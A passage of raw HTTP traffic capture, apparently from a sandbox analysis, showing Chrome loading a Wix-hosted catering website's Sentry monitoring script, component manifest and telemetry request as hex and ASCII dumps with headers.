                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 74 65 28 74 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 6f 5b 6e 5d 3d 3d 3d 74 29 7b 6f 2e 73 70 6c 69 63 65 28 6e 2c 31 29 3b 62 72 65 61 6b 7d 7d 5d 29 3b 76 61 72 20 61 3d 75 28 69 2c 32 29 2c 63 3d 61 5b 30 5d 2c 73 3d 61 5b 31 5d 3b 69 66 28 30 3d 3d 3d 72 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 74 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 3b 69 66 28 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3d 3d 3d 6e 29 72 65 74 75 72 6e 22 5b 4f 62 6a 65 63 74 5d 22 3b 69 66 28 22 5b 6f 62 6a 65 63 74 20
                                                                                                                                                                                                                        Data Ascii: te(t);else for(var n=0;n<o.length;n++)if(o[n]===t){o.splice(n,1);break}}]);var a=u(i,2),c=a[0],s=a[1];if(0===r)return function(t){if("string"==typeof t)return t;var n=Object.prototype.toString.call(t);if("[object Object]"===n)return"[Object]";if("[object
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 29 7b 69 66 28 21 74 74 28 29 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 71 75 65 73 74 28 22 5f 22 2c 7b 72 65 66 65 72 72 65 72 50 6f 6c 69 63 79 3a 22 6f 72 69 67 69 6e 22 7d 29 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 76 61 72 20 69 74 2c 65 74 3d 73 28 29 2c 6f 74 3d 7b 7d 2c 75 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 74 28 74 29 7b 69 66 28 21 75 74 5b 74 5d 29 73 77 69 74 63 68 28 75 74 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 63 6f 6e 73 6f 6c 65 22 69 6e 20 65 74 29
                                                                                                                                                                                                                        Data Ascii: de\]\s+\}$/.test(t.toString())}function rt(){if(!tt())return!1;try{return new Request("_",{referrerPolicy:"origin"}),!0}catch(t){return!1}}var it,et=s(),ot={},ut={};function at(t){if(!ut[t])switch(ut[t]=!0,t){case"console":!function(){if(!("console"in et)
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 68 61 6e 64 6c 65 72 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 6f 5b 6e 5d 29 2c 30 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 2e 5f 5f 73 65 6e 74 72 79 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 72 2c 69 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 65 74 29 29 72 65 74 75 72 6e 3b 76 61 72 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 58 28 74 2c 22 6f 70 65 6e 22 2c 28 66
                                                                                                                                                                                                                        Data Ascii: handler=void 0,delete o[n]),0===Object.keys(o).length&&delete e.__sentry_instrumentation_handlers__)}catch(t){}return t.call(this,n,r,i)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in et))return;var t=XMLHttpRequest.prototype;X(t,"open",(f
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 69 2e 68 69 64 64 65 6e 3d 21 30 2c 72 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2c 69 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 26 26 69 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 26 26 28 6e 3d 6e 74 28 69 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 29 29 2c 72 2e 68 65 61 64 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 6e 7d 28 29 29 72 65 74 75 72 6e 3b 58 28 65 74 2c 22 66 65 74 63 68 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 2c 72 3d 30 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72
                                                                                                                                                                                                                        Data Ascii: i.hidden=!0,r.head.appendChild(i),i.contentWindow&&i.contentWindow.fetch&&(n=nt(i.contentWindow.fetch)),r.head.removeChild(i)}catch(t){}return n}())return;X(et,"fetch",(function(t){return function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        91192.168.2.55002034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC639OUTGET /services/editor-elements/1.13190.0/rb_wixui.thunderbolt.manifest.min.json HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1156INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 41390
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: WnNsjhZsOZ.0BQOcd89gEo8gaNMG6i2E
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 336702805 289211457
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 542009330
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 10:16:08 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 99419
                                                                                                                                                                                                                        Last-Modified: Wed, 08 Jan 2025 16:47:17 GMT
                                                                                                                                                                                                                        ETag: "e171c088607cf01fc09db32f853fca64"
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC234INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 30 22 2c 22 68 6f 73 74 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 77 69 78 75 69 22 2c 22 62 61 73 65 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 65 64 69 74 6f 72 2d 65 6c 65 6d 65 6e 74 73 2d 6c 69 62 72 61 72 79 2f 64 69 73 74 2f 74 68 75 6e 64 65 72 62 6f 6c 74 2f 22 2c 22 6d 6f 64 65 6c 22 3a 5b 22 63 65 35 33 66 33 34 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 36 66 30 36 38 62 66 39 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 61 73 73 65 74 73 22 3a 5b 5b 22 73 74 79 6c 61 62 6c 65 2d 6d 65 74 61 64 61 74
                                                                                                                                                                                                                        Data Ascii: {"version":"2.0","host":"thunderbolt","namespace":"wixui","baseURL":"https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/","model":["ce53f34f.bundle.min.js","6f068bf9.min.css"],"assets":[["stylable-metadat
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 61 22 2c 22 65 64 69 74 6f 72 2d 65 6c 65 6d 65 6e 74 73 2d 6c 69 62 72 61 72 79 2e 74 68 75 6e 64 65 72 62 6f 6c 74 2e 37 65 32 35 30 31 63 61 33 38 38 39 61 30 65 64 61 31 36 66 35 35 39 32 61 36 62 63 63 62 35 37 66 31 32 38 30 65 30 39 2e 6d 65 74 61 64 61 74 61 2e 6a 73 6f 6e 22 5d 5d 2c 22 63 6f 6d 70 6f 6e 65 6e 74 73 22 3a 7b 22 41 63 63 6f 72 64 69 6f 6e 43 6f 6e 74 61 69 6e 65 72 22 3a 5b 22 63 64 30 36 30 65 37 34 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 31 38 65 63 64 65 30 33 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 41 63 63 6f 72 64 69 6f 6e 49 74 65 6d 5f 43 6c 61 73 73 69 63 22 3a 5b 22 32 33 32 33 32 32 39 36 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 31 30 66 30 61 63 61 61 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 41 63 63 6f 72
                                                                                                                                                                                                                        Data Ascii: a","editor-elements-library.thunderbolt.7e2501ca3889a0eda16f5592a6bccb57f1280e09.metadata.json"]],"components":{"AccordionContainer":["cd060e74.bundle.min.js","18ecde03.min.css"],"AccordionItem_Classic":["23232296.bundle.min.js","10f0acaa.min.css"],"Accor
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 22 65 62 38 37 38 35 64 37 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 42 6f 6c 74 43 6f 6d 70 6f 6e 65 6e 74 22 3a 5b 22 30 33 63 62 37 30 36 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 35 30 30 38 39 63 65 65 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 42 72 65 61 64 63 72 75 6d 62 73 22 3a 5b 22 33 65 37 35 35 30 39 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 5d 2c 22 42 72 65 61 64 63 72 75 6d 62 73 5f 53 74 79 6c 61 62 6c 65 43 6f 6d 70 6f 6e 65 6e 74 22 3a 5b 22 37 33 36 33 31 65 37 36 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 33 30 61 33 62 39 65 38 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 42 72 65 61 64 63 72 75 6d 62 73 5f 55 44 50 43 6f 6d 70 6f 6e 65 6e 74 22 3a 5b 22 61 36 63 64 64 32 64 38 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22
                                                                                                                                                                                                                        Data Ascii: "eb8785d7.min.css"],"BoltComponent":["03cb706d.bundle.min.js","50089cee.min.css"],"Breadcrumbs":["3e75509f.bundle.min.js"],"Breadcrumbs_StylableComponent":["73631e76.bundle.min.js","30a3b9e8.min.css"],"Breadcrumbs_UDPComponent":["a6cdd2d8.bundle.min.js","
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 32 66 36 34 62 31 62 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6d 62 6f 42 6f 78 49 6e 70 75 74 22 3a 5b 22 33 33 31 62 39 30 34 35 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 33 38 64 35 39 30 38 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6d 62 6f 42 6f 78 49 6e 70 75 74 5f 43 6f 6d 62 6f 42 6f 78 49 6e 70 75 74 4e 61 76 69 67 61 74 69 6f 6e 22 3a 5b 22 39 63 35 30 61 63 65 37 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 37 66 33 38 31 64 39 36 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 45 6d 61 69 6c 44 69 61 6c 6f 67 22 3a 5b 22 38 31 62 65 37 64 32 35 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 31 35 31 39 35 62 31 66 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e
                                                                                                                                                                                                                        Data Ascii: le.min.js","2f64b1b2.min.css"],"ComboBoxInput":["331b9045.bundle.min.js","38d59082.min.css"],"ComboBoxInput_ComboBoxInputNavigation":["9c50ace7.bundle.min.js","7f381d96.min.css"],"ConfirmationEmailDialog":["81be7d25.bundle.min.js","15195b1f.min.css"],"Con
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 30 37 38 30 34 32 61 32 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 74 61 69 6e 65 72 5f 46 6f 72 6b 65 64 52 69 67 68 74 52 69 62 62 6f 6e 22 3a 5b 22 34 33 36 38 33 65 31 38 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 31 38 38 66 63 64 33 63 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 74 61 69 6e 65 72 5f 47 72 69 64 41 72 65 61 22 3a 5b 22 33 65 65 31 39 35 36 64 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 66 36 66 63 63 38 35 38 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 74 61 69 6e 65 72 5f 49 6e 6e 65 72 4d 61 72 67 69 6e 41 72 65 61 53 6b 69 6e 22 3a 5b 22 66 39 63 39 62 34 38 38 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 36 33 34 65 65 66 66 31 2e 6d 69 6e 2e 63 73 73 22 5d 2c
                                                                                                                                                                                                                        Data Ascii: undle.min.js","078042a2.min.css"],"Container_ForkedRightRibbon":["43683e18.bundle.min.js","188fcd3c.min.css"],"Container_GridArea":["3ee1956d.bundle.min.js","f6fcc858.min.css"],"Container_InnerMarginAreaSkin":["f9c9b488.bundle.min.js","634eeff1.min.css"],
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 35 33 30 61 31 33 33 39 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 74 61 69 6e 65 72 5f 53 61 6e 64 43 6c 6f 63 6b 41 72 65 61 22 3a 5b 22 36 62 32 65 38 37 64 63 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 32 35 63 64 65 65 38 36 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 74 61 69 6e 65 72 5f 53 63 6f 74 63 68 44 6f 75 62 6c 65 48 6f 72 69 7a 6f 6e 74 61 6c 41 72 65 61 22 3a 5b 22 39 31 38 36 39 33 34 61 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 65 39 36 64 64 37 36 30 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 43 6f 6e 74 61 69 6e 65 72 5f 53 63 6f 74 63 68 44 6f 75 62 6c 65 56 65 72 74 69 63 61 6c 41 72 65 61 22 3a 5b 22 62 37 38 33 62 33 34 38 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73
                                                                                                                                                                                                                        Data Ascii: e.bundle.min.js","530a1339.min.css"],"Container_SandClockArea":["6b2e87dc.bundle.min.js","25cdee86.min.css"],"Container_ScotchDoubleHorizontalArea":["9186934a.bundle.min.js","e96dd760.min.css"],"Container_ScotchDoubleVerticalArea":["b783b348.bundle.min.js
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 22 5d 2c 22 44 61 74 65 50 69 63 6b 65 72 5f 44 61 74 65 50 69 63 6b 65 72 54 65 78 74 59 65 61 72 4e 61 76 53 6b 69 6e 22 3a 5b 22 36 33 30 32 62 66 30 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 61 34 33 34 38 66 39 64 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 69 73 71 75 73 43 6f 6d 6d 65 6e 74 73 22 3a 5b 22 33 34 39 61 34 33 30 31 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 64 62 64 62 30 39 35 36 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 69 73 71 75 73 43 6f 6d 6d 65 6e 74 73 5f 57 69 74 68 43 6f 6e 73 65 6e 74 57 72 61 70 70 65 72 22 3a 5b 22 39 61 65 30 30 30 35 34 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 38 36 36 31 37 32 37 63 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 6f 63 75 6d 65 6e 74 4d 65 64 69 61 22 3a 5b 22 34 34 32 30
                                                                                                                                                                                                                        Data Ascii: "],"DatePicker_DatePickerTextYearNavSkin":["6302bf0e.bundle.min.js","a4348f9d.min.css"],"DisqusComments":["349a4301.bundle.min.js","dbdb0956.min.css"],"DisqusComments_WithConsentWrapper":["9ae00054.bundle.min.js","8661727c.min.css"],"DocumentMedia":["4420
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 72 6f 70 44 6f 77 6e 4d 65 6e 75 5f 52 69 62 62 6f 6e 73 4d 65 6e 75 42 75 74 74 6f 6e 53 6b 69 6e 22 3a 5b 22 35 34 65 64 62 38 37 30 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 65 63 39 31 64 34 33 64 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 72 6f 70 44 6f 77 6e 4d 65 6e 75 5f 53 65 70 61 72 61 74 65 41 72 72 6f 77 44 6f 77 6e 4d 65 6e 75 53 6b 69 6e 22 3a 5b 22 30 37 31 34 33 39 35 37 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 66 61 36 31 65 33 36 34 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 72 6f 70 44 6f 77 6e 4d 65 6e 75 5f 53 65 70 61 72 61 74 65 42 61 73 69 63 4d 65 6e 75 42 75 74 74 6f 6e 53 6b 69 6e 22 3a 5b 22 65 30 65 65 30 35 63 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 36 35 62 62
                                                                                                                                                                                                                        Data Ascii: .min.css"],"DropDownMenu_RibbonsMenuButtonSkin":["54edb870.bundle.min.js","ec91d43d.min.css"],"DropDownMenu_SeparateArrowDownMenuSkin":["07143957.bundle.min.js","fa61e364.min.css"],"DropDownMenu_SeparateBasicMenuButtonSkin":["e0ee05ce.bundle.min.js","65bb
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 72 73 4d 65 6e 75 42 75 74 74 6f 6e 53 6b 69 6e 22 3a 5b 22 66 65 32 32 37 37 63 36 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 61 33 33 33 34 66 65 64 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 72 6f 70 44 6f 77 6e 4d 65 6e 75 5f 56 65 72 74 69 63 61 6c 52 69 62 62 6f 6e 73 4d 65 6e 75 42 75 74 74 6f 6e 53 6b 69 6e 22 3a 5b 22 66 36 31 34 33 30 61 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 38 39 66 62 64 38 66 63 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 44 79 6e 61 6d 69 63 52 65 70 65 61 74 65 72 22 3a 5b 22 34 66 38 32 33 62 37 63 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 5d 2c 22 45 6e 74 65 72 50 61 73 73 77 6f 72 64 44 69 61 6c 6f 67 22 3a 5b 22 66 33 33 39 31 62 36 39 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 61 33 66 31 30 33
                                                                                                                                                                                                                        Data Ascii: rsMenuButtonSkin":["fe2277c6.bundle.min.js","a3334fed.min.css"],"DropDownMenu_VerticalRibbonsMenuButtonSkin":["f61430a2.bundle.min.js","89fbd8fc.min.css"],"DynamicRepeater":["4f823b7c.bundle.min.js"],"EnterPasswordDialog":["f3391b69.bundle.min.js","a3f103
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 69 6e 2e 63 73 73 22 5d 2c 22 46 69 76 65 47 72 69 64 4c 69 6e 65 5f 46 61 64 65 4e 6f 74 63 68 42 6f 74 74 6f 6d 4c 69 6e 65 22 3a 5b 22 36 66 32 63 61 32 61 36 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 64 37 39 63 32 37 30 66 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 46 69 76 65 47 72 69 64 4c 69 6e 65 5f 46 61 64 65 4e 6f 74 63 68 54 6f 70 4c 69 6e 65 22 3a 5b 22 33 39 62 35 66 62 32 62 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 31 65 34 33 35 64 38 61 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 46 69 76 65 47 72 69 64 4c 69 6e 65 5f 46 69 76 65 47 72 69 64 4c 69 6e 65 53 6b 69 6e 22 3a 5b 22 61 65 31 36 35 31 31 37 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 2c 22 64 61 62 32 30 34 37 64 2e 6d 69 6e 2e 63 73 73 22 5d 2c 22 46 69 76 65 47 72 69 64
                                                                                                                                                                                                                        Data Ascii: in.css"],"FiveGridLine_FadeNotchBottomLine":["6f2ca2a6.bundle.min.js","d79c270f.min.css"],"FiveGridLine_FadeNotchTopLine":["39b5fb2b.bundle.min.js","1e435d8a.min.css"],"FiveGridLine_FiveGridLineSkin":["ae165117.bundle.min.js","dab2047d.min.css"],"FiveGrid


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        92192.168.2.55001834.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC640OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 640
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC640OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 65 78 65 63 75 74 65 2d 74 68 75 6e 64 65 72 62 6f 6c 74 2d 66 65 61 74 75 72 65 73 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 53 54 41 52 54 22 2c 22 73 65 73 73 69 6f 6e 49 64
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"execute-thunderbolt-features","transactionAction":"START","sessionId
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC866INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:08 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLi4tgvOYx+ZebO8M3xYKOCiWWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0AszrXkqI6C0ECaaQjMwGNFEQfi00LSS7LJu7sdkoLsDPF3kOJXU30QqO1kpZqYkJA==,r6yY0ta7bIKrqK70x072leyNvFwt8Ru5H1X/6VDV0Yg=,bOnBQDOCjWxRPsoIciwTIc+fRTylQVzgEDfttCE5NNJh7Ex3ynmOn3I6XnJdRcXL0V1RotrzmtDuA+2bbt9oMg==
                                                                                                                                                                                                                        x-wix-request-id: 1736517188.0035619653536801338507
